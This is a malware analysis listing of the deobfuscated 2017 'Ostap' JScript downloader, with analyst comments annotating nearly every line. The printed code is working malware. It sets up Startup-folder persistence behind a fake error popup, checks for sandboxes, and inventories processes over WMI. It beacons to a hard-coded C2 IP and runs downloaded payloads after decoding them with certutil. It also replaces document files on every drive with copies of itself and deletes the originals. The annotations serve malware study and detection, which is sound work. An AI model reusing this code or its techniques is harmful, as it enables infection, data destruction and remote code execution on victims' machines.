
2017 Ostap Deobfuscated
// Analyst annotations for a deobfuscated Windows Script Host (JScript) downloader.
// The script runs under WScript (this["WScript"], ActiveXObject, GetObject), so
// "document" at the anti-analysis branch below is not defined in this host.
// Flow, as visible here: optional self-copy into the Startup folder, a long
// counter-based delay, WMI inventory of OS + processes, then an endless POST
// beacon loop that saves a returned payload to %TEMP% and executes it.
// Indicators that appear verbatim in this sample: the hard-coded C2 URL below,
// the Startup-folder file name "\fly.jse", %TEMP%\saymyname.txt, a ".gop"
// file decoded via "certutil -f -decode", and "cmd /U /Q /C dir /b/s/x" over
// document extensions on every ready fixed/removable drive.

// Junk string assignments (never read). Several of these names are redeclared
// below with their real values (graplingfield47, graplingsystem48,
// graplingmultiply81, graplingstate28).
graplingexcited86 = "meAre50";
graplingphysics7 = "cause84";
graplingemit13 = "crack1";
graplingresearch99 = "tell69";
graplingwith56 = "moanedOr54";
graplingelectron87 = "beautiful3";
graplingbeen5 = "stuck91";
graplingstate28 = "trying30";
graplinghowever69 = "shoesAnd81";
graplingsince55 = "just4";
graplingenergy83 = "single66";
graplingenergy57 = "expect50";
graplingundergo36 = "will1";
graplingfield47 = "starting11";
graplingwith91 = "have79";
graplingmultiply81 = "home57";
graplingdifference74 = "like52";
graplingoften91 = "opens13";
graplingeffect23 = "throughAre67";
graplingsystem36 = "like8";
graplingvisible9 = "should81";
graplinghighly22 = "Ill45";
graplingsystem48 = "that8";
graplingother71 = "assLaugh8";
graplingreleased37 = "these4";
graplingelectron55 = "seeWhat46";
var graplingelectron64 = "cfgvtyguhbnjiokqw";
// Campaign/identifier string sent as the "add=" query value in the beacon URL.
var String3456 = "noway";
// Aliases for WSH globals, looked up via this[...] to hide the names.
var graplingfield47 = this["WScript"];
var EnmN = this["Enumerator"];
var GeObj = this["GetObject"];
var ActXN = this["ActiveXObject"];
// WScript.Shell: ExpandEnvironmentStrings, Popup, Exec.
var graplingthan91 = graplingfield47["CreateObject"]("WScript.Shell");
// Scripting.FileSystemObject: file read/write/delete, Drives enumeration.
var graplingionize38 = new ActXN("Scripting.FileSystemObject");
// ADODB.Stream, used later to write a binary response body to disk.
var fstream = null;
try {
fstream = new ActXN("ADODB.Stream");
} catch (zsxdcfvgbhnj) {}
// Shell.Application: NameSpace (Startup folder) and ShellExecute.
var oShell23 = new ActXN("Shell.Application");
var graplingenergy28 = graplingthan91["ExpandEnvironmentStrings"]("%TEMP%");
var graplingprocesses43 = graplingthan91["ExpandEnvironmentStrings"]("%USERPROFILE%");
// 100 - 8 = 92 -> "\" (backslash); 30 + 4 = 34 -> '"' (double quote).
var char123 = String["fromCharCode"](100 - (2 * 2 + 4));
var charq = String["fromCharCode"](30 + 2 * 2);
// Random 1..999; not referenced anywhere below.
var graplingstate70 = Math["floor"](Math["random"]() * 999 + 1);
var graplingsystem48 = "";
var graplingbinding46 = "";
// HTTP client for the beacon.
var graplingsingle20 = new ActXN("Msxml2.ServerXMLHTTP");
// "\fly.jse" -- file name used for the Startup-folder copy.
var graplingthat52 = char123 + "fly.jse";
// NameSpace(7): Shell special-folder constant; the variable name and later use
// indicate the user's Startup folder.
var startupFolder = oShell23["NameSpace"](8 + 4 - 5);
var tone789 = 1;
var graplingnucleus47 = 0;
var icount = 0;
var graplingelectron84 = false;
// out123: state/"o=" value reported to the C2 (0 = nothing run yet; 8..11 or
// a process id after a payload was launched).
var out123 = 0;
var exit123 = 0;
// Passed as the option index to ServerXMLHTTP.setOption below.
var graplingtransferred4 = 3;
// Hard-coded C2 endpoint (HTTPS to a raw IP on a non-standard port).
var HujikOlp = "https://185.159.82.142:8500/PL/placezero.php?add=";
var graplingconsidered90 = null;
var graplingfields93 = null;
var graplingprimarily24 = false;
// true once the script has read its own first line for persistence (see below).
var graplingrules39 = false;
var graplingshell56 = null;
// PE header magic, compared against the first two bytes of a downloaded file.
var graplingthat34 = "MZ";
var graplingsaid40 = "POST";
var oExec12 = null;
// Full path of the currently running script.
var graplingscientific56 = graplingfield47["ScriptFullName"];
var filets = null;
var frefre656 = null;
// <Startup folder>\fly.jse -- persistence path.
var auto90989r = startupFolder["Self"]["Path"] + graplingthat52;
// Startup path + %TEMP% path; hashed below into a per-host "u=" identifier.
var uidhere = auto90989r + graplingenergy28;
// Loop-count threshold for the spin delay (2,030,000 iterations).
var delay123 = ("2030000") * 1;
// certutil arguments: "-f -decode " (base64 decode, overwrite).
var graplingstate28 = "-f -decode ";
// 0xFFFFFFFF mask applied to the hash.
var nod32sucks = ("4294967295") * 1;
var url_ppp = null;
var obj00WMI = null;
var col00Items = graplingnucleus47;
var objI999tem = null;
var output67888 = graplingnucleus47;
var col00Items2 = null;
// graplinghave8: accumulated process inventory; os456: OS caption + version.
var graplinghave8 = "";
var os456 = "";
var graplingexcess96 = "";
var waytocrypt = "";
var graplingconsiders32 = "";
var colDrives = graplingionize38["Drives"];
var graplingpower95 = null;
var graplingmore67 = null;
// Document extensions searched on each drive (used in the "dir /b/s/x" below).
var ext789 = "*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb *.wps *.xlk *.ppt *.mdb *.accdb *.pst *.dwg *.dxf *.dxg *.wpd";
var diskcount = 1;
// Name of the file list written to %TEMP%.
var list87656 = "saymyname.txt";
var pussy89 = null;
var graplingmultiply81 = null;
// graplingenergy85: execution mode selected by the C2 response header
// "you_god_damn_right" (-1 default, 0/1/2 as set below).
var graplingenergy85 = -1;
// If not already running from the Startup-folder path, show an "Error" popup
// (8-second timeout, icon type 16) and, when it returns 1 (presumably the OK
// button), read the script's own first line for the persistence copy.
// NOTE(review): a timed-out popup does not return 1, so persistence then
// depends on the user clicking within the timeout -- confirm against WshShell.Popup.
try {
if (graplingscientific56 != auto90989r) {
if (graplingthan91["Popup"]("There was an error opening this document.", 4 + 4, "Error", 16) == 1) {
graplingconsidered90 = graplingionize38["OpenTextFile"](graplingscientific56, 1, false, 0);
graplingmultiply81 = graplingconsidered90["ReadLine"]();
graplingconsidered90["Close"]();
graplingrules39 = true;
}
}
} catch (zsxdcfvgbhnj) {}
// Outer loop: spin a counter until it equals delay123, then do everything else
// once. The inner beacon loop below never terminates, so the trailing "break"
// is not reached in normal operation.
while (true) {
tone789 = tone789 + 1;
graplingelectron64 = "tesbb";
if (tone789 == delay123) {
// Hash of uidhere: ((h << 5) - h + c) & 0xFFFFFFFF per character
// ("3 + 2" binds before "<<"; "&" binds after "+"/"-").
for (icount = 1 - 1; icount < uidhere["length"]; icount++) {
graplingnucleus47 = (graplingnucleus47 << 3 + 2) - graplingnucleus47 + uidhere["charCodeAt"](icount) & nod32sucks;
}
// "v=" value: 10 when the Startup path does not contain "\AppData\", else 20.
if (auto90989r["indexOf"](char123 + "AppData" + char123) == -1) {
icount = 10;
} else {
icount = 20;
}
// WMI inventory: OS caption+version into os456; one "Name*Path*Domain|User"
// CRLF-terminated record per process into graplinghave8.
try {
obj00WMI = GeObj("winmgmts:{impersonationLevel=impersonate}!" + char123 + char123 + "." + char123 + "root" + char123 + "cimv2");
col00Items = new EnmN(obj00WMI["ExecQuery"]("Select * from Win32_Process"));
col00Items2 = new EnmN(obj00WMI["ExecQuery"]("Select * from Win32_OperatingSystem"));
while (!col00Items2["atEnd"]()) {
os456 = os456 + col00Items2["item"]()["Caption"] + col00Items2["item"]()["Version"];
col00Items2["moveNext"]();
}
while (!col00Items["atEnd"]()) {
objI999tem = col00Items["item"]();
output67888 = objI999tem["ExecMethod_"]("GetOwner");
graplinghave8 = graplinghave8 + objI999tem["Name"] + "*" + objI999tem["ExecutablePath"] + "*" + output67888["Domain"] + "|" + output67888["User"] + String["fromCharCode"](13) + String["fromCharCode"](10);
col00Items["moveNext"]();
}
} catch (zsxdcfvgbhnj) {}
// Anti-analysis: substring match of the process inventory against monitoring
// tools, VM guest services and known sandbox user/host names. This branch is
// outside any try; under WSH "document" is undefined, so a match ends the
// script with an unhandled error rather than showing an alert.
if (graplinghave8["indexOf"]("Procmon") != graplingenergy85 || graplinghave8["indexOf"]("Wireshark") != graplingenergy85 || graplinghave8["indexOf"]("Temp" + char123 + "iexplore.exe") != graplingenergy85 || graplinghave8["indexOf"]("ProcessHacker") != -1 || graplinghave8["indexOf"]("vmtoolsd") != graplingenergy85 || graplinghave8["indexOf"]("VBoxService") != -1 || graplinghave8["indexOf"]("python") != graplingenergy85 || graplinghave8["indexOf"]("Proxifier.exe") != graplingenergy85 || graplinghave8["indexOf"]("Johnson-PC") != -1 || graplinghave8["indexOf"]("ImmunityDebugger.exe") != -1 || graplinghave8["indexOf"]("lordPE.exe") != -1 || graplinghave8["indexOf"]("ctfmon.exe*JOHN-PC") != graplingenergy85 || graplinghave8["indexOf"]("BehaviorDumper") != graplingenergy85 || graplinghave8["indexOf"]("anti-virus.EXE") != graplingenergy85 || graplinghave8["indexOf"]("AgentSimulator.exe") != -1 || graplinghave8["indexOf"]("VzService.exe") != -1 || graplinghave8["indexOf"]("VmRemoteGuest") != graplingenergy85 || graplinghave8["indexOf"]("SystemIT|admin") != graplingenergy85) {
document["alert"]("Screw you guys, Im going home!!!!");
}
// Persistence: write the previously read first line of this script to
// <Startup>\fly.jse (presumably the whole obfuscated script fits on one line;
// cannot be confirmed from here).
if (graplingrules39) {
graplingfields93 = graplingionize38["CreateTextFile"](auto90989r, true, false);
graplingfields93["WriteLine"](graplingmultiply81);
graplingfields93["Close"]();
}
// Beacon loop (never exits; iterations end via "continue" or the final sleep).
while (true) {
graplingelectron64 = "fuck it..";
try {
// Fresh random file names in %TEMP%: <n>.exe (payload) and <n>.gop (encoded text).
graplingsystem48 = graplingenergy28 + char123 + Math["floor"](Math["random"]() * 987 + 1) + ".exe";
graplingbinding46 = graplingenergy28 + char123 + Math["floor"](Math["random"]() * 590 + 1) + ".gop";
// setOption(3, "MSXML") -- NOTE(review): looks like a ServerXMLHTTP SSL-related
// option index; confirm against the MSXML documentation.
graplingsingle20["setOption"](graplingtransferred4, "MSXML");
// URL: add=<campaign>&u=<host hash>&o=<state>&v=<10|20>&<random cache-buster>.
url_ppp = HujikOlp + String3456 + "&u=" + Math["abs"](graplingnucleus47) + "&o=" + out123 + "&v=" + icount + "&" + Math["floor"](Math["random"]() * 456 + 1) + Math["floor"](Math["random"]() * 780 + 1);
graplingsingle20["open"](graplingsaid40, url_ppp, false);
// First-run body: OS string + CRLF (13, 10) + process inventory; otherwise empty.
if (graplingrules39) {
graplingsingle20["send"](os456 + String["fromCharCode"](10 + 3) + String["fromCharCode"](5 + 5) + graplinghave8);
} else {
graplingsingle20["send"]();
}
if (graplingsingle20["status"] == 200) {
if (out123 == 0) {
graplingshell56 = graplingsingle20["responseText"];
// Response header "you_god_damn_right" selects the execution mode:
// "0" also redirects the save path to the Startup .jse (i.e. a script update).
try {
if (graplingsingle20["getResponseHeader"]("you_god_damn_right") == "0") {
graplingsystem48 = auto90989r;
graplingenergy85 = 0;
}
} catch (zsxdcfvgbhnj) {}
try {
if (graplingsingle20["getResponseHeader"]("you_god_damn_right") == "1") graplingenergy85 = 1;
} catch (zsxdcfvgbhnj) {}
try {
if (graplingsingle20["getResponseHeader"]("you_god_damn_right") == "2") graplingenergy85 = 2;
} catch (zsxdcfvgbhnj) {}
// Payload delivery: binary body saved directly via ADODB.Stream (Type 1,
// SaveToFile mode 2), otherwise text > 10 chars is written to the .gop file
// and decoded to the .exe path with "certutil -f -decode" after 7 s.
try {
if (graplingsingle20["getResponseHeader"]("Content-Transfer-Encoding") == "binary") {
fstream["Open"]();
fstream["Type"] = 1;
fstream["Write"](graplingsingle20["responseBody"]);
fstream["Position"] = 0;
fstream["SaveToFile"](graplingsystem48, 2);
fstream["Close"]();
} else {
if (graplingshell56.length > 10) {
graplingconsidered90 = graplingionize38["CreateTextFile"](graplingbinding46, true, false);
graplingconsidered90["WriteLine"](graplingshell56);
graplingconsidered90["Close"]();
graplingfield47["Sleep"](7e3);
oShell23["ShellExecute"]("certutil", graplingstate28 + graplingbinding46 + " " + charq + graplingsystem48 + charq, "", "open", 0);
}
}
} catch (zsxdcfvgbhnj) {}
}
// Mode 0 (script update): wait 60 s, reset mode, report o=9, re-beacon.
if (graplingenergy85 == 0) {
graplingfield47["Sleep"](6e4);
graplingenergy85 = -1;
out123 = 9;
continue;
}
graplingfield47["Sleep"](2e4);
// No payload on disk: enumerate ready fixed (3) or removable (1) drives other
// than the profile drive, list document files into %TEMP%\saymyname.txt
// (90 s per drive, then 30 s), and for each listed path copy the Startup
// .jse to "<path up to first '.'>.jse" and delete the original file.
// The substring cut at the first '.' means any '.' earlier in the path
// truncates the target name.
if (!graplingionize38["FileExists"](graplingsystem48)) {
try {
graplingpower95 = new EnmN(colDrives);
for (;!graplingpower95["atEnd"](); graplingpower95["moveNext"]()) {
graplingmore67 = graplingpower95["item"]();
if (graplingmore67["IsReady"] && (graplingmore67["DriveType"] == 3 || graplingmore67["DriveType"] == 1) && graplingprocesses43["substring"](0, 1) != graplingmore67["DriveLetter"]) {
oShell23["ShellExecute"]("cmd", "/U /Q /C cd /D " + graplingmore67["DriveLetter"] + ": && dir /b/s/x " + ext789 + ">>%TEMP%\\" + list87656, "", "open", 0);
graplingfield47["Sleep"](1e3 * 90);
}
}
graplingfield47["Sleep"](1e3 * 30);
frefre656 = graplingionize38["GetFile"](graplingenergy28 + char123 + list87656)["OpenAsTextStream"](1, -1);
while (!frefre656["AtEndOfStream"]) {
waytocrypt = frefre656["ReadLine"]();
graplingconsiders32 = waytocrypt["substring"](0, waytocrypt["indexOf"]("."));
oShell23["ShellExecute"]("cmd", "/U /Q /C copy /Y " + charq + auto90989r + charq + " " + charq + graplingconsiders32 + ".jse" + charq + " && del /Q/F " + charq + waytocrypt + charq, "", "open", 0);
}
frefre656["Close"]();
graplingionize38["DeleteFile"](graplingenergy28 + char123 + list87656);
} catch (zsxdcfvgbhnj) {}
out123 = 0;
graplingprimarily24 = false;
continue;
}
// Payload present: check the first two bytes for "MZ" (PE) before launching.
filets = graplingionize38["GetFile"](graplingsystem48)["OpenAsTextStream"](1);
graplingexcess96 = filets["ReadLine"]()["substring"](0, 2);
if (graplingexcess96 == graplingthat34 && out123 == 0) {
try {
// Launch by mode; fromCharCode(47) is "/". Case 2 references oShell123 and
// filepath, neither declared in this listing, so it throws into the catch
// below, which falls back to WScript.Shell.Exec and reports the process id.
switch (graplingenergy85) {
case -1:
oShell23["ShellExecute"]("cmd", String["fromCharCode"](47) + "c start " + graplingsystem48, "", "open", 0);
out123 = 8;
break;
case 0:
oShell23["ShellExecute"]("cmd", String["fromCharCode"](47) + "c start " + graplingsystem48, "", "open", 0);
out123 = 9;
break;
case 1:
oShell23["ShellExecute"]("rundll32", charq + graplingsystem48 + charq + " secretFunction", "", "open", 0);
out123 = 10;
break;
case 2:
oShell123["ShellExecute"](filepath, "/silent /install", "", "runas", 1);
out123 = 11;
break;
}
} catch (zsxdcfvgbhnj) {
try {
oExec12 = graplingthan91["Exec"](graplingsystem48);
out123 = oExec12["ProcessID"];
} catch (zsxdcfvgbhnj) {}
}
graplingfield47["Sleep"](1e4);
}
// Cleanup of %TEMP% artifacts. As printed, the "\*" sequences are JScript
// escapes that evaluate to "*", so the command text becomes "%TEMP%*.exe"
// etc.; presumably a lost backslash from deobfuscation -- worth checking
// whether the intended files are actually removed on a given host.
try {
oShell23["ShellExecute"]("cmd", "/U /Q /C del /Q/F %TEMP%\*.exe && del /Q/F %TEMP%\*.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\*.log && del /Q/F %TEMP%\*.jse", "", "open", 0);
graplingionize38["DeleteFile"](graplingsystem48);
} catch (zsxdcfvgbhnj) {}
filets["Close"]();
}
} catch (zsxdcfvgbhnj) {}
// 50 s between beacons.
graplingfield47["Sleep"](1e3 * 50);
}
break;
}
}
// Trailing junk assignments (never read).
graplingatomic13 = "undefined";
graplingterm21 = "undefined";